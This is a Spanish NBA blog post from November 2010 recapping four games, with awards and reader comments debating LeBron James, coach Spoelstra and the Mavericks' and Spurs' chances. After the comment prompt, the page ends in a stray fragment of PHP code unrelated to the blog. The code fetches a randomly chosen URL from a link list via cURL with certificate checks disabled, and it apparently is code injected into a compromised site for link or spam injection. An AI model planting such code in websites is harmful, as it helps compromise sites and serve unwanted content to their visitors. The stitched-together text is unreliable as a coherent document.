La Crónica (29/11/2010)

30 de November de 2010 por TheDeerHunter

No es noticia. Los Mavs son el equipo más en forma de la liga y los Rockets no opusieron demasiada resistencia a la hora de evitar la 6º victoria consecutiva, una más que el total que suma Houston a lo largo de todo el curso (91-101). No fue el peor partido de los de Adelman, pero tampoco fue el mejor de los Mavericks, que pudieron permitirse un cómodo reparto de minutos administrando sus rentas. A los Rockets les urge la vuelta de Brooks así como una buena dosis de trabajo recuperando la confianza. Tal y como están sus rivales en el Oeste mucho nos tememos que está cerca de ser demasiado tarde.

Los Jazz también se mantienen en la cresta de la ola. Anoche dieron buena cuenta de los Bucks, a pesar de los esfuerzos de Jennings, Ilyasova y Douglas-Roberts (88-109). Sin Bogut ni Gooden delante, Al Jefferson se puso las botas. Deron Williams se limitó a controlar el ritmo para asegurar un choque en el que eran manifiestamente superiores.

En el duelo más igualado de la jornada los Thunder doblegaron con serias dificultades a los Hornets (89-95). Superándoles por 20 rebotes de diferencia y por 12 tiros libres aún necesitaron del mayor de los esfuerzos de Westbrook, Durant y Green (20 de 55 entre los tres) más un acierto casi irrepetible de Sefolosha (4-4TC; 2-2 3p; 3-3 TL) para llevarse el gato al agua. Los Hornets se hicieron el hara-kiri fallando en muchos aspectos del juego. Sólo el empeño de Chris Paul les mantuvo en la pomada hasta el último minuto.

Finalmente los Beach Boys ganaron jugando razonablemente bien contra Washington (94-105). Fue un partido durísimo que recordó aquellas series vs los Cavs de LeBron. Muchos golpes, piques e interrupciones que los Heat supieron manejar. Ojo, porque el caso de Spoelstra se complica y el otro día “El Elegido” le vaciló de forma muy fea en uno de los tiempos muertos. Si han encontrado en él el chivo expiatorio de sus pecados ya lo tiene claro. Lo mejor es que vaya haciendo las maletas.

Y ojito porque se especula con que podríamos volver a disfrutar del “baloncesto exquisito” de Antonie Walker. Parece que están dispuestos a ficharle en el equipo de Idaho en la D-League. Os mantendremos informados.

PREMIOS

MVP: Partido plácido para Al Jefferson, que lo aprovechó convenientemente con sus 22 ptos, 11 rebotes y 4 tapones. Algo más duro para Dwyane Wade, que registro 28 p-8 reb-6 asis a pesar de varios golpes que se llevó de regalo. El más importante para su equipo, a pesar de que no estuvo extremadamente fino, fue Russell Westbrook que le está comiendo la tostada como líder al mismísmo Durant. Ayer 25 puntos, 5 rebotes, 11 asistencias y 5 robos contra CP3 y anotando triples decisivos en su cara.

Rookie: Noche intrascendente para gregarios como Booker, Pondexter, Hayward… que no han alcanzado la más mínima importancia en sus equipos. Peor fue para Larry Sanders que sí fue center titular para Milwaukee, pero que se fue calentito para su casa.

Sorpresa: Chris Douglas-Roberts vuelve a la palestra pasándole por encima a compañeros como John Salmons. Dos partidos y unos muy buenos 15 puntitos de oro para su necesitado equipo.

Decepción: La estupidez y la cobardía de LeBron James públicamente con Spoelstra no tiene límites. En algo sí tenía razón Dan Gilbert en su misiva. Un grande no puede permitirse cierto tipo de gestos y por esta razón, para mí, al Elegido todavía le queda un buen trecho para llegar a serlo.

El mayor esfuerzo en vano: Nos dio un susto anoche en una mala caída, y a pesar de todo se mató y se multiplicó para sacar algo positivo de Oklahoma. Chris Paul dio un recital de pundonor con 17 puntos, 14 rebotes y 5 robos. Nunca le he visto rendirse ante nada ni nadie.

Comenta

21 comentarios a esta entrada

  1. Scriers dice:
    #1

    Thedee hay veces que tienes cada falton, quita el deveria ese que hace dañooooo!
    En cuento a lo de Lebron, esta claro que estamos hablando de alguien de un ego desproporcionado, que asume su condicion de estrella como si fuera una persona de otro planeta al que hay que atender y escuchar. Además su sentido del espectaculo dista mucho de shaq por ejemplo. no se, es un tipo capaz de caer mal a mucha gente. Eso si como jugador parece que necesita de buenos acompañantes para canalizar su clase.
    Ayer via miami tan mal como siempre, me sorprende el pesimo nivel de wade, que ayer, por mucho que los numeros digan, hizo un mal partido.
    Luego vi el neworleans contra Oklahoma. Definitivamente a Paul solo no le da para mejores propositos que meterse en playoff y definitivamente Durant tiene el punto de mira desviado de tanto elogio.

      Citar

  2. TheDeerHunter dice:
    #2

    Perdón, Scriers… pero no veo el falton (con acento) que me comentas… ni siquiera utilizando el buscador del navegador.
    Trato de cuidar esos detalles pero escribo muchísimo en este blog y siempre lo hago con prisas y sin tiempo.
    Normalmente le paso el corrector y así ha sido en este artículo… pero parece ser que no somos infalibles (ni el corrector ni yo)
    Cuento con que nos lo sepáis perdonar porque no puedo prometer que no vaya a cometer errores.

      Citar

  3. MagicJohnson32 dice:
    #3

    Tranqui, Deer, eres una monstruo y se te perdona todo.

    Qué mal pinta para Spoelstra. Demoledor artículo de Wojnarowski sobre la relación LeBron-Spoelstra: http://sports.yahoo.com/nba/news;_ylt=An0sA.CxqYDwoF07jRlcXca8vLYF?slug=aw-lebronspoelstra112910

      Citar

  4. TheDeerHunter dice:
    #4

    ¿una monstruo?? qué cosa más rara

    el artículo es durillo: “El principal problema de Spoelstra no es que LeBron no respeta a los técnicos. Es que no respeta a nadie.Trata a todos como sirvientes”.

    Y a Wade tampoco le deja de lado…

      Citar

  5. Viva_Dirk dice:
    #5

    Si es que poner a alguien sin experiencia alguna a cargo de un grupo así es una locura, y como comentaba Deer hace unas fechas la cosa no va lo suficientemente bien para que Riley se arriesgue a bajar desde ya. Deberian haber convencido a Coach K, jeje.

      Citar

  6. Scriers dice:
    #6

    Perdón Thedee… yo también escribo desde el móvil y debería saber qué es eso (por eso faltón no lleva acento) y no saltar, jajaja. Espero sepas disculparme.
    Bueno, hay ejemplo de gente si experiencia que les ha ido bien a las primeras de cambio, yo he visto algunos tiempos muertos de Spoelstra y algunos videos, y me parece un buen técnico, pero muchas veces basta con que la persona o personas adecuadas, jugadores, periodistas, etc, estén en tu contra, para que te veas haciendo las maletas. Lo que está claro es que no acaba la temporada.

      Citar

  7. MagicJohnson32 dice:
    #7

    Bueno, Spoelstra llevaba dos años metiendo a unos Heat muy flojos en Playoffs, tampoco me parecía descabellado intentarlo con él. Ahora, si LeBron no va a poner un poquito de su parte, obviamente el que tiene todas las de perder es el entrenador.

      Citar

  8. TheDeerHunter dice:
    #8

    Nada Scriers… que cuando las críticas/correcciones son constructivas y de buen rollo yo nunca tengo problemas. Pero insisto en que sigo sin saber a qué faltón te referías ahora.

    Por otro lado… soy TheDeerHunter en referencia a “El cazador”. Literalmente TheDeerHunter es cazador de ciervos, por eso no me entusiasma demasiado que me llamen Deer, pero TheDee no tiene ningún significado.

      Citar

  9. MagicJohnson32 dice:
    #9

    Oye, monstrua (¿mejor así? xD), la falta a la que se refiere Scriers la he corregido, por eso no la encuentras, jeje.

    ¿Veis a los Mavs con opciones de algo? Mira que Chandler está jugando como nunca, y Dirk es muy grande, pero no sé, no me los acabo de creer.

      Citar

  10. TheDeerHunter dice:
    #10

    No es sólo que Chandler está jugando como nunca y que Dirk es muy grande… es que Marion está aportando, Kidd está increíble, Terry está otra vez a nivel mejor 6º hombre… y aún me extraña que no entren en la dinámica ni Butler ni Haywood.
    Y aún más… están defendiendo como nunca y por fin Carlisle da signos de existir desde que llegó allí.

    Los Mavs a buen nivel tienen estatus de contendiente.

      Citar

  11. Denise dice:
    #11

    Los Mavs son para mí, el 2º mejor equipo del Oeste y el 5º de la NBA, no este año, ya lo eran el año pasado, lo que no entiendo es por qué siempre la cagan en los momentos impotantes, es decir, en playoffs. Pero tienen un gran quinteto, y un banquillo notable, lo normal teniendo en cuenta el dineral que se deja Cuban cada año para luego no ganar nada…upps, esto me recuerda a un tal Florentino.

      Citar

  12. MagicJohnson32 dice:
    #12

    Pero mojaos, jeje. Lo que digo es que pese a todo eso, pese a lo bien que están jugando y que cuentan con una gran plantilla, no me creo a los Mavs. No los veo compitiendo por el anillo.

      Citar

  13. Denise dice:
    #13

    Los Mavs, semis de conferencia minimo, y con posibilidad de dar algun susto a Lakers en la final de conferencia.

      Citar

  14. LEmontus dice:
    #14

    Bucks empezará a ganr partidos cuando Bogut esté por fin libre de lesiones y Salmons pierda muchísimo protagonismo en ataque y lo cojan Douglas-Roberts y Delfino. Es increible que bucks haya perdidos a sus dos interiores titulares y y atres exteriores importantes de dos de ellos titulares…. con tanto lesionado poco hay que hacer…

      Citar

  15. MagicJohnson32 dice:
    #15

    Decir que pasarán una ronda y tienen “posibilidad de dar algún susto a Lakers” no es mojarse mucho.

    Por ejemplo: ¿Mavs o Spurs?

      Citar

  16. nacho dice:
    #16

    Spurs sin duda.

      Citar

  17. MagicJohnson32 dice:
    #17

    Pues eso. Para mí los Spurs están por delante de los Mavs, y ninguno de ellos está al nivel de los Lakers.

    Bogut ya dijo que iba a arrastrar problemas todo el año, así que si los Bucks dependen de su salud, mal lo llevan. Y peor aún si le dan las riendas a Douglas-Roberts, creo yo.

      Citar

  18. Denise dice:
    #18

    MAVS.
    El oeste lo veo, Lakers por enciam de todos, tres peldaños por debajo los thunders y los Mavs, y un peldaño mas abajo los Spurs

      Citar

  19. TheDeerHunter dice:
    #19

    Yo ya me mojo todos los años con un buen número de pronósticos con diversa fortuna.
    Ojito porque Viva ya se mojó bastante en el suyo situándolos en finales de conferencia (cosa que a priori yo no firmaba en ese momento)… pero vamos, que tampoco se ponga una medalla todavía porque colocó a los Hornets de los últimos puestos de conferencia XD (y eso sí lo firmaba yo :C)

    En fin… que quitando el favoritismo claro y fácil de Lakers el poner a Dallas por encima o cerca de Spurs, Thunder o los propios Hornets es jugar a la lotería. Muy pocos hubieramos apostado por los Suns a estas alturas el año pasado.
    Yo creo que tienen mejor equipo que Spurs… pero una serie a muerte contra la tríada de los Spurs al 100% y Popovic jugando al ajedrez contra Carlisle es lo que tiene. Siempre apostaría a favor de un ex-campeón. Pero muchas veces perdería.

      Citar

  20. Viva_Dirk dice:
    #20

    Lo peor que tienen los Mavs es claramente el entrenador, como dice Deer en una eliminatoria a 7 partidos los ajustes de Popo, Phil Jackson o Adelman son mucho mejores que los de Carlisle.

    Ya hablaremos de los Hornets, hasta el momento me da que ni ellos se creen que tantas cosas esten saliendo bien.

      Citar

  21. sergio dice:
    #21

    Los Hornets de ahora me recuerdan a los Phoenix del años pasado…. casi un 90% en victorias en los 15 primeros partidos y una mala racha a partir de ahi que les hace perder protagonismo hasta el final de Regular. Creo que si tienen a todos sus activos disponibles, daran guerra en postemporada. Yo los pongo ahora mismo al nivel de OKC

    Para mi los Spurs estan por delante de Mavs por varios motivos. El primero es Popovich. El segundo sus antecendentes en Playoffs. El tercero Ginobili, Parker y Duncan decidiendo partidos frente a solo Nowitzki. Las rotaciones de jugadores me parecen parecidas, con ciertos jugadores dados a la dispersion en momentos decisivos. Eso si, este año veo fisicamente regular a Duncan como para defender a la rotacion interior de los Mavs, con muchos centimetros.

    Por cierto, hablais mucho de LA, SAS, Dallas, OKC y NOH pero os olvidais a Utah… para mi serio contendiente a llegar a las Finales de conferencia. Sloan + Salt Lake City + Williams es un factor a tener en cuenta. Tambien creo que deberian acoplar a AK47 y a Hayward para optar a algo serio de verdad, pero los veo al nivel del resto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>